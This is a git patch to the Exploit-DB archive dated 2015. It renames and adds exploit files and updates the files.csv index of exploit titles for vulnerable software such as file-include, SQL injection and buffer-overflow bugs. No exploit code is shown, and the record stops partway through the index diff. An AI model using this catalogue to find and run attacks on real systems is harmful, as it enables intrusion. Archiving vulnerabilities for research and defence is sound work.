From db80d16c14c8f052a81916816d55c8241724710e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 2 Jan 2015 13:21:34 +0000 Subject: [PATCH] Update: 2015-01-02 149 new exploits --- files.csv | 304 +++++++++--------- platforms/aix/dos/{19041 => 19041.txt} | 0 platforms/aix/dos/{19043 => 19043.txt} | 0 platforms/aix/dos/{19045 => 19045.txt} | 0 platforms/aix/dos/{19046 => 19046.txt} | 0 platforms/aix/dos/{19049 => 19049.txt} | 0 platforms/aix/local/{19229 => 19229.txt} | 0 platforms/aix/local/{19300 => 19300.txt} | 0 platforms/aix/local/{19345 => 19345.txt} | 0 platforms/aix/local/{19354 => 19354.txt} | 0 platforms/aix/local/{19418 => 19418.txt} | 0 platforms/aix/remote/{19047 => 19047.txt} | 0 platforms/aix/remote/{19048 => 19048.txt} | 0 platforms/aix/remote/{19237 => 19237.txt} | 0 platforms/aix/remote/{19348 => 19348.txt} | 0 platforms/bsd/local/{19411 => 19411.txt} | 0 platforms/bsd/remote/{19039 => 19039.txt} | 0 platforms/hardware/dos/{19436 => 19436.txt} | 0 platforms/hardware/dos/{19477 => 19477.txt} | 0 .../hardware/remote/{19444 => 19444.txt} | 0 platforms/irix/local/{19066 => 19066.txt} | 0 platforms/irix/local/{19067 => 19067.txt} | 0 platforms/irix/local/{19210 => 19210.txt} | 0 platforms/irix/local/{19262 => 19262.txt} | 0 platforms/irix/local/{19268 => 19268.txt} | 0 platforms/irix/local/{19269 => 19269.txt} | 0 platforms/irix/local/{19280 => 19280.txt} | 0 platforms/irix/local/{19304 => 19304.txt} | 0 platforms/irix/local/{19313 => 19313.txt} | 0 platforms/irix/local/{19349 => 19349.txt} | 0 platforms/irix/local/{19353 => 19353.txt} | 0 platforms/irix/local/{19355 => 19355.txt} | 0 platforms/irix/local/{19356 => 19356.txt} | 0 platforms/irix/local/{19358 => 19358.txt} | 0 platforms/linux/dos/{19080 => 19080.txt} | 0 platforms/linux/dos/{19082 => 19082.txt} | 0 platforms/linux/local/{19070 => 19070.txt} | 0 platforms/linux/local/{19071 => 19071.txt} | 0 platforms/linux/local/{19072 => 19072.txt} | 0 platforms/linux/local/{19073 => 19073.txt} | 0 platforms/linux/local/{19074 => 19074.txt} | 0 platforms/linux/local/{19095 => 19095.txt} | 0 platforms/linux/local/{19122 => 19122.txt} | 0 platforms/linux/local/{19125 => 19125.txt} | 0 platforms/linux/local/{19243 => 19243.txt} | 0 platforms/linux/local/{19250 => 19250.txt} | 0 platforms/linux/local/{19255 => 19255.txt} | 0 platforms/linux/local/{19272 => 19272.txt} | 0 platforms/linux/local/{19285 => 19285.txt} | 0 platforms/linux/local/{19422 => 19422.txt} | 0 platforms/linux/local/{19474 => 19474.txt} | 0 platforms/linux/remote/{19069 => 19069.txt} | 0 platforms/linux/remote/{19076 => 19076.txt} | 0 platforms/linux/remote/{19124 => 19124.txt} | 0 platforms/linux/remote/{19253 => 19253.txt} | 0 platforms/multiple/dos/{19225 => 19225.txt} | 0 platforms/multiple/dos/{19377 => 19377.txt} | 0 platforms/multiple/dos/{19378 => 19378.txt} | 0 platforms/multiple/dos/{19379 => 19379.txt} | 0 platforms/multiple/dos/{19380 => 19380.txt} | 0 platforms/multiple/dos/{19382 => 19382.txt} | 0 platforms/multiple/dos/{19457 => 19457.txt} | 0 platforms/multiple/local/{19430 => 19430.txt} | 0 .../multiple/remote/{19081 => 19081.txt} | 0 .../multiple/remote/{19084 => 19084.txt} | 0 .../multiple/remote/{19093 => 19093.txt} | 0 platforms/multiple/remote/19118 | 9 - .../multiple/remote/{19120 => 19120.txt} | 0 .../multiple/remote/{19121 => 19121.txt} | 0 .../multiple/remote/{19127 => 19127.txt} | 0 .../multiple/remote/{19129 => 19129.txt} | 0 .../multiple/remote/{19193 => 19193.txt} | 0 .../multiple/remote/{19194 => 19194.txt} | 0 .../multiple/remote/{19212 => 19212.txt} | 0 .../multiple/remote/{19221 => 19221.txt} | 0 .../multiple/remote/{19222 => 19222.txt} | 0 .../multiple/remote/{19223 => 19223.txt} | 0 .../multiple/remote/{19230 => 19230.txt} | 0 .../multiple/remote/{19242 => 19242.txt} | 0 .../multiple/remote/{19298 => 19298.txt} | 0 .../multiple/remote/{19299 => 19299.txt} | 0 .../multiple/remote/{19303 => 19303.txt} | 0 .../multiple/remote/{19363 => 19363.txt} | 0 .../multiple/remote/{19383 => 19383.txt} | 0 .../multiple/remote/{19443 => 19443.txt} | 0 .../multiple/remote/{19451 => 19451.txt} | 0 .../multiple/remote/{19459 => 19459.txt} | 0 .../multiple/remote/{19466 => 19466.txt} | 0 .../multiple/remote/{19492 => 19492.txt} | 0 .../multiple/remote/{19493 => 19493.txt} | 0 .../netbsd_x86/local/{19261 => 19261.txt} | 0 platforms/netware/local/{19364 => 19364.txt} | 0 platforms/netware/remote/{19365 => 19365.txt} | 0 platforms/osx/local/{19417 => 19417.txt} | 0 platforms/osx/local/{19427 => 19427.txt} | 0 platforms/osx/local/{19434 => 19434.txt} | 0 platforms/osx/local/{19437 => 19437.txt} | 0 platforms/osx/local/{19438 => 19438.txt} | 0 platforms/osx/local/{19439 => 19439.txt} | 0 platforms/php/webapps/35662.txt | 75 +++++ platforms/php/webapps/35663.txt | 9 + platforms/php/webapps/35664.txt | 53 +++ platforms/php/webapps/35665.txt | 7 + platforms/php/webapps/35666.txt | 9 + platforms/php/webapps/35667.txt | 15 + platforms/php/webapps/35668.txt | 14 + platforms/php/webapps/35670.txt | 166 ++++++++++ platforms/solaris/dos/{19042 => 19042.txt} | 0 platforms/solaris/local/{19126 => 19126.txt} | 0 platforms/solaris/local/{19161 => 19161.txt} | 0 platforms/solaris/local/{19232 => 19232.txt} | 0 platforms/solaris/local/{19233 => 19233.txt} | 0 platforms/solaris/local/{19235 => 19235.txt} | 0 platforms/solaris/local/{19326 => 19326.txt} | 0 platforms/solaris/remote/{19040 => 19040.txt} | 0 platforms/solaris/remote/{19044 => 19044.txt} | 0 platforms/solaris/remote/{19236 => 19236.txt} | 0 platforms/unix/local/{19068 => 19068.txt} | 0 platforms/unix/local/{19108 => 19108.txt} | 0 platforms/windows/dos/{19207 => 19207.txt} | 0 platforms/windows/dos/{19372 => 19372.txt} | 0 platforms/windows/dos/{19445 => 19445.txt} | 0 platforms/windows/dos/{19489 => 19489.txt} | 0 platforms/windows/local/{19144 => 19144.txt} | 0 platforms/windows/local/{19167 => 19167.txt} | 0 platforms/windows/local/{19192 => 19192.txt} | 0 platforms/windows/local/{19196 => 19196.txt} | 0 platforms/windows/local/{19198 => 19198.txt} | 0 platforms/windows/local/{19227 => 19227.txt} | 0 platforms/windows/local/{19359 => 19359.txt} | 0 platforms/windows/local/{19376 => 19376.txt} | 0 platforms/windows/local/{19425 => 19425.txt} | 0 platforms/windows/local/{19472 => 19472.txt} | 0 platforms/windows/local/{19473 => 19473.txt} | 0 platforms/windows/local/35661.txt | 20 ++ platforms/windows/local/35671.rb | 95 ++++++ platforms/windows/remote/{19094 => 19094.txt} | 0 platforms/windows/remote/{19113 => 19113.txt} | 0 platforms/windows/remote/{19147 => 19147.txt} | 0 platforms/windows/remote/{19152 => 19152.txt} | 0 platforms/windows/remote/{19156 => 19156.txt} | 0 platforms/windows/remote/{19164 => 19164.txt} | 0 platforms/windows/remote/{19197 => 19197.txt} | 0 platforms/windows/remote/{19208 => 19208.txt} | 0 platforms/windows/remote/{19238 => 19238.txt} | 0 platforms/windows/remote/{19239 => 19239.txt} | 0 platforms/windows/remote/{19361 => 19361.txt} | 0 platforms/windows/remote/{19468 => 19468.txt} | 0 platforms/windows/remote/{19487 => 19487.txt} | 0 platforms/windows/remote/{19490 => 19490.txt} | 0 platforms/windows/remote/{19491 => 19491.txt} | 0 151 files changed, 620 insertions(+), 156 deletions(-) rename platforms/aix/dos/{19041 => 19041.txt} (100%) rename platforms/aix/dos/{19043 => 19043.txt} (100%) rename platforms/aix/dos/{19045 => 19045.txt} (100%) rename platforms/aix/dos/{19046 => 19046.txt} (100%) rename platforms/aix/dos/{19049 => 19049.txt} (100%) rename platforms/aix/local/{19229 => 19229.txt} (100%) rename platforms/aix/local/{19300 => 19300.txt} (100%) rename platforms/aix/local/{19345 => 19345.txt} (100%) rename platforms/aix/local/{19354 => 19354.txt} (100%) rename platforms/aix/local/{19418 => 19418.txt} (100%) rename platforms/aix/remote/{19047 => 19047.txt} (100%) rename platforms/aix/remote/{19048 => 19048.txt} (100%) rename platforms/aix/remote/{19237 => 19237.txt} (100%) rename platforms/aix/remote/{19348 => 19348.txt} (100%) rename platforms/bsd/local/{19411 => 19411.txt} (100%) rename platforms/bsd/remote/{19039 => 19039.txt} (100%) rename platforms/hardware/dos/{19436 => 19436.txt} (100%) rename platforms/hardware/dos/{19477 => 19477.txt} (100%) rename platforms/hardware/remote/{19444 => 19444.txt} (100%) rename platforms/irix/local/{19066 => 19066.txt} (100%) rename platforms/irix/local/{19067 => 19067.txt} (100%) rename platforms/irix/local/{19210 => 19210.txt} (100%) rename platforms/irix/local/{19262 => 19262.txt} (100%) rename platforms/irix/local/{19268 => 19268.txt} (100%) rename platforms/irix/local/{19269 => 19269.txt} (100%) rename platforms/irix/local/{19280 => 19280.txt} (100%) rename platforms/irix/local/{19304 => 19304.txt} (100%) rename platforms/irix/local/{19313 => 19313.txt} (100%) rename platforms/irix/local/{19349 => 19349.txt} (100%) rename platforms/irix/local/{19353 => 19353.txt} (100%) rename platforms/irix/local/{19355 => 19355.txt} (100%) rename platforms/irix/local/{19356 => 19356.txt} (100%) rename platforms/irix/local/{19358 => 19358.txt} (100%) rename platforms/linux/dos/{19080 => 19080.txt} (100%) rename platforms/linux/dos/{19082 => 19082.txt} (100%) rename platforms/linux/local/{19070 => 19070.txt} (100%) rename platforms/linux/local/{19071 => 19071.txt} (100%) rename platforms/linux/local/{19072 => 19072.txt} (100%) rename platforms/linux/local/{19073 => 19073.txt} (100%) rename platforms/linux/local/{19074 => 19074.txt} (100%) rename platforms/linux/local/{19095 => 19095.txt} (100%) rename platforms/linux/local/{19122 => 19122.txt} (100%) rename platforms/linux/local/{19125 => 19125.txt} (100%) rename platforms/linux/local/{19243 => 19243.txt} (100%) rename platforms/linux/local/{19250 => 19250.txt} (100%) rename platforms/linux/local/{19255 => 19255.txt} (100%) rename platforms/linux/local/{19272 => 19272.txt} (100%) rename platforms/linux/local/{19285 => 19285.txt} (100%) rename platforms/linux/local/{19422 => 19422.txt} (100%) rename platforms/linux/local/{19474 => 19474.txt} (100%) rename platforms/linux/remote/{19069 => 19069.txt} (100%) rename platforms/linux/remote/{19076 => 19076.txt} (100%) rename platforms/linux/remote/{19124 => 19124.txt} (100%) rename platforms/linux/remote/{19253 => 19253.txt} (100%) rename platforms/multiple/dos/{19225 => 19225.txt} (100%) rename platforms/multiple/dos/{19377 => 19377.txt} (100%) rename platforms/multiple/dos/{19378 => 19378.txt} (100%) rename platforms/multiple/dos/{19379 => 19379.txt} (100%) rename platforms/multiple/dos/{19380 => 19380.txt} (100%) rename platforms/multiple/dos/{19382 => 19382.txt} (100%) rename platforms/multiple/dos/{19457 => 19457.txt} (100%) rename platforms/multiple/local/{19430 => 19430.txt} (100%) rename platforms/multiple/remote/{19081 => 19081.txt} (100%) rename platforms/multiple/remote/{19084 => 19084.txt} (100%) rename platforms/multiple/remote/{19093 => 19093.txt} (100%) delete mode 100755 platforms/multiple/remote/19118 rename platforms/multiple/remote/{19120 => 19120.txt} (100%) rename platforms/multiple/remote/{19121 => 19121.txt} (100%) rename platforms/multiple/remote/{19127 => 19127.txt} (100%) rename platforms/multiple/remote/{19129 => 19129.txt} (100%) rename platforms/multiple/remote/{19193 => 19193.txt} (100%) rename platforms/multiple/remote/{19194 => 19194.txt} (100%) rename platforms/multiple/remote/{19212 => 19212.txt} (100%) rename platforms/multiple/remote/{19221 => 19221.txt} (100%) rename platforms/multiple/remote/{19222 => 19222.txt} (100%) rename platforms/multiple/remote/{19223 => 19223.txt} (100%) rename platforms/multiple/remote/{19230 => 19230.txt} (100%) rename platforms/multiple/remote/{19242 => 19242.txt} (100%) rename platforms/multiple/remote/{19298 => 19298.txt} (100%) rename platforms/multiple/remote/{19299 => 19299.txt} (100%) rename platforms/multiple/remote/{19303 => 19303.txt} (100%) rename platforms/multiple/remote/{19363 => 19363.txt} (100%) rename platforms/multiple/remote/{19383 => 19383.txt} (100%) rename platforms/multiple/remote/{19443 => 19443.txt} (100%) rename platforms/multiple/remote/{19451 => 19451.txt} (100%) rename platforms/multiple/remote/{19459 => 19459.txt} (100%) rename platforms/multiple/remote/{19466 => 19466.txt} (100%) rename platforms/multiple/remote/{19492 => 19492.txt} (100%) rename platforms/multiple/remote/{19493 => 19493.txt} (100%) rename platforms/netbsd_x86/local/{19261 => 19261.txt} (100%) rename platforms/netware/local/{19364 => 19364.txt} (100%) rename platforms/netware/remote/{19365 => 19365.txt} (100%) rename platforms/osx/local/{19417 => 19417.txt} (100%) rename platforms/osx/local/{19427 => 19427.txt} (100%) rename platforms/osx/local/{19434 => 19434.txt} (100%) rename platforms/osx/local/{19437 => 19437.txt} (100%) rename platforms/osx/local/{19438 => 19438.txt} (100%) rename platforms/osx/local/{19439 => 19439.txt} (100%) create mode 100755 platforms/php/webapps/35662.txt create mode 100755 platforms/php/webapps/35663.txt create mode 100755 platforms/php/webapps/35664.txt create mode 100755 platforms/php/webapps/35665.txt create mode 100755 platforms/php/webapps/35666.txt create mode 100755 platforms/php/webapps/35667.txt create mode 100755 platforms/php/webapps/35668.txt create mode 100755 platforms/php/webapps/35670.txt rename platforms/solaris/dos/{19042 => 19042.txt} (100%) rename platforms/solaris/local/{19126 => 19126.txt} (100%) rename platforms/solaris/local/{19161 => 19161.txt} (100%) rename platforms/solaris/local/{19232 => 19232.txt} (100%) rename platforms/solaris/local/{19233 => 19233.txt} (100%) rename platforms/solaris/local/{19235 => 19235.txt} (100%) rename platforms/solaris/local/{19326 => 19326.txt} (100%) rename platforms/solaris/remote/{19040 => 19040.txt} (100%) rename platforms/solaris/remote/{19044 => 19044.txt} (100%) rename platforms/solaris/remote/{19236 => 19236.txt} (100%) rename platforms/unix/local/{19068 => 19068.txt} (100%) rename platforms/unix/local/{19108 => 19108.txt} (100%) rename platforms/windows/dos/{19207 => 19207.txt} (100%) rename platforms/windows/dos/{19372 => 19372.txt} (100%) rename platforms/windows/dos/{19445 => 19445.txt} (100%) rename platforms/windows/dos/{19489 => 19489.txt} (100%) rename platforms/windows/local/{19144 => 19144.txt} (100%) rename platforms/windows/local/{19167 => 19167.txt} (100%) rename platforms/windows/local/{19192 => 19192.txt} (100%) rename platforms/windows/local/{19196 => 19196.txt} (100%) rename platforms/windows/local/{19198 => 19198.txt} (100%) rename platforms/windows/local/{19227 => 19227.txt} (100%) rename platforms/windows/local/{19359 => 19359.txt} (100%) rename platforms/windows/local/{19376 => 19376.txt} (100%) rename platforms/windows/local/{19425 => 19425.txt} (100%) rename platforms/windows/local/{19472 => 19472.txt} (100%) rename platforms/windows/local/{19473 => 19473.txt} (100%) create mode 100755 platforms/windows/local/35661.txt create mode 100755 platforms/windows/local/35671.rb rename platforms/windows/remote/{19094 => 19094.txt} (100%) rename platforms/windows/remote/{19113 => 19113.txt} (100%) rename platforms/windows/remote/{19147 => 19147.txt} (100%) rename platforms/windows/remote/{19152 => 19152.txt} (100%) rename platforms/windows/remote/{19156 => 19156.txt} (100%) rename platforms/windows/remote/{19164 => 19164.txt} (100%) rename platforms/windows/remote/{19197 => 19197.txt} (100%) rename platforms/windows/remote/{19208 => 19208.txt} (100%) rename platforms/windows/remote/{19238 => 19238.txt} (100%) rename platforms/windows/remote/{19239 => 19239.txt} (100%) rename platforms/windows/remote/{19361 => 19361.txt} (100%) rename platforms/windows/remote/{19468 => 19468.txt} (100%) rename platforms/windows/remote/{19487 => 19487.txt} (100%) rename platforms/windows/remote/{19490 => 19490.txt} (100%) rename platforms/windows/remote/{19491 => 19491.txt} (100%) diff --git a/files.csv b/files.csv index e23ab1001..d005aa57c 100755 --- a/files.csv +++ b/files.csv @@ -2127,7 +2127,7 @@ id,file,description,date,author,platform,type,port 2432,platforms/php/webapps/2432.txt,"BrudaNews <= 1.1 (admin/index.php) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 (fs_form_links.php) File Include Vuln",2006-09-25,SHiKaA,php,webapps,0 -2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability",2006-09-26,ThE-WoLf-KsA,php,webapps,0 +2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 - (parser.php) Remote File Include Vulnerability",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Include Vulnerability",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 (hit.php) Remote File Include Vulnerability",2006-09-26,D_7J,php,webapps,0 @@ -9012,7 +9012,7 @@ id,file,description,date,author,platform,type,port 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH)",2009-08-31,hack4love,windows,local,0 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 HTTP Mail Service Stack BOF Exploit PoC",2009-08-31,"fl0 fl0w",windows,dos,0 -9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23//5.1//6.0 (.hex) Universal Local BOF Exploits (SEH)",2009-08-31,hack4love,windows,local,0 +9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - (.hex) Universal Local BOF Exploits (SEH)",2009-08-31,hack4love,windows,local,0 9551,platforms/windows/local/9551.py,"Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0 9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta (listings.php op) SQL Injection Vulnerability",2009-08-31,Mr.SQL,php,webapps,0 9553,platforms/php/webapps/9553.txt,"BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities",2009-08-31,Affix,php,webapps,0 @@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21 -9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 (.m3u//UI.txt) Universal Local BOF Exploits",2009-09-01,hack4love,windows,local,0 +9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BOF Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0 9563,platforms/php/webapps/9563.txt,"Joomla Component com_artportal 1.0 (portalid) SQL Injection Vulns",2009-09-01,"599eme Man",php,webapps,0 @@ -16412,17 +16412,17 @@ id,file,description,date,author,platform,type,port 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling Vulnerability (MS12-005)",2012-06-11,metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 -19039,platforms/bsd/remote/19039,"BSD 4.2 fingerd Buffer Overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0 -19040,platforms/solaris/remote/19040,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0 -19041,platforms/aix/dos/19041,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,anonymous,aix,dos,0 -19042,platforms/solaris/dos/19042,"SunOS <= 4.1.1 /usr/release/bin/makeinstall Vulnerability",1999-11-23,anonymous,solaris,dos,0 -19043,platforms/aix/dos/19043,"SunOS <= 4.1.1 /usr/release/bin/winstall Vulnerability",1999-11-12,anonymous,aix,dos,0 -19044,platforms/solaris/remote/19044,"SunOS <= 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS Vulnerability",1992-05-27,anonymous,solaris,remote,0 -19045,platforms/aix/dos/19045,"SunOS <= 4.1.3 kmem setgid /etc/crash Vulnerability",1993-02-03,anonymous,aix,dos,0 -19046,platforms/aix/dos/19046,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow Vulnerability",1999-10-15,"Chris Wedgwood",aix,dos,0 -19047,platforms/aix/remote/19047,"Stalker Internet Mail Server 1.6 - Buffer Overflow Vulnerability",2001-09-12,"David Luyer",aix,remote,0 -19048,platforms/aix/remote/19048,"IRIX <= 6.4 pfdisplay.cgi Vulnerability",1998-04-07,"J.A. Gutierrez",aix,remote,0 -19049,platforms/aix/dos/19049,"BSDI <= 4.0 tcpmux / inetd crash Vulnerability",1998-04-07,"Mark Schaefer",aix,dos,0 +19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd Buffer Overflow Vulnerability",1988-10-01,anonymous,bsd,remote,0 +19040,platforms/solaris/remote/19040.txt,"SunView (SunOS <= 4.1.1) selection_svc Vulnerability",1990-08-14,"Peter Shipley",solaris,remote,0 +19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 /usr/bin/chroot Vulnerability",1991-05-01,anonymous,aix,dos,0 +19042,platforms/solaris/dos/19042.txt,"SunOS <= 4.1.1 /usr/release/bin/makeinstall Vulnerability",1999-11-23,anonymous,solaris,dos,0 +19043,platforms/aix/dos/19043.txt,"SunOS <= 4.1.1 /usr/release/bin/winstall Vulnerability",1999-11-12,anonymous,aix,dos,0 +19044,platforms/solaris/remote/19044.txt,"SunOS <= 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS Vulnerability",1992-05-27,anonymous,solaris,remote,0 +19045,platforms/aix/dos/19045.txt,"SunOS <= 4.1.3 kmem setgid /etc/crash Vulnerability",1993-02-03,anonymous,aix,dos,0 +19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow Vulnerability",1999-10-15,"Chris Wedgwood",aix,dos,0 +19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow Vulnerability",2001-09-12,"David Luyer",aix,remote,0 +19048,platforms/aix/remote/19048.txt,"IRIX <= 6.4 pfdisplay.cgi Vulnerability",1998-04-07,"J.A. Gutierrez",aix,remote,0 +19049,platforms/aix/dos/19049.txt,"BSDI <= 4.0 tcpmux / inetd crash Vulnerability",1998-04-07,"Mark Schaefer",aix,dos,0 19050,platforms/php/webapps/19050.txt,"Wordpress wp-gpx-map 1.1.21 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19052,platforms/php/webapps/19052.txt,"Wordpress User Meta 1.1.1 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 @@ -16436,34 +16436,34 @@ id,file,description,date,author,platform,type,port 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 -19066,platforms/irix/local/19066,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 -19067,platforms/irix/local/19067,"SGI IRIX <= 6.4,SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 -19068,platforms/unix/local/19068,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability",1998-04-06,"ru5ty and SoReN",unix,local,0 -19069,platforms/linux/remote/19069,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow Vulnerability",1998-04-14,"Netstat Webmaster",linux,remote,0 -19070,platforms/linux/local/19070,"Slackware Linux 3.4 - liloconfig-color temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 -19071,platforms/linux/local/19071,"Slackware Linux 3.4 - makebootdisk temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 -19072,platforms/linux/local/19072,"ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability",1998-04-10,"Joe H",linux,local,0 -19073,platforms/linux/local/19073,"Slackware Linux 3.4 - netconfig temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 -19074,platforms/linux/local/19074,"Slackware Linux 3.4 - pkgtool temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 +19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 +19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4,SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 +19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability",1998-04-06,"ru5ty and SoReN",unix,local,0 +19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow Vulnerability",1998-04-14,"Netstat Webmaster",linux,remote,0 +19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 +19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 +19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability",1998-04-10,"Joe H",linux,local,0 +19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 +19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 19075,platforms/linux/remote/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service Vulnerability",1998-04-10,Schlossnagle,linux,remote,0 -19076,platforms/linux/remote/19076,"Apple Personal Web Sharing 1.1 Vulnerability",1998-04-10,"Netstat Webmaster",linux,remote,0 +19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 Vulnerability",1998-04-10,"Netstat Webmaster",linux,remote,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (2)",1998-05-05,pr10n,linux,local,0 19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14,QuakeWorld 2.0/2.1,Quake 1.9/3.13/3.14",1998-05-01,"Mark Zielinski",linux,remote,0 -19080,platforms/linux/dos/19080,"Debian suidmanager 0.18 Vulnerability",1998-04-28,"Thomas Roessler",linux,dos,0 -19081,platforms/multiple/remote/19081,"Lynx 2.8 - Buffer Overflow Vulnerability",1998-05-03,"Michal Zalewski",multiple,remote,0 -19082,platforms/linux/dos/19082,"AMD K6 Processor Vulnerability",1998-06-01,Poulot-Cazajous,linux,dos,0 +19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 Vulnerability",1998-04-28,"Thomas Roessler",linux,dos,0 +19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow Vulnerability",1998-05-03,"Michal Zalewski",multiple,remote,0 +19082,platforms/linux/dos/19082.txt,"AMD K6 Processor Vulnerability",1998-06-01,Poulot-Cazajous,linux,dos,0 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability",1998-06-10,"Paul Boyer",windows,remote,0 -19084,platforms/multiple/remote/19084,"Metainfo Sendmail 2.0/2.5,MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 +19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5,MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 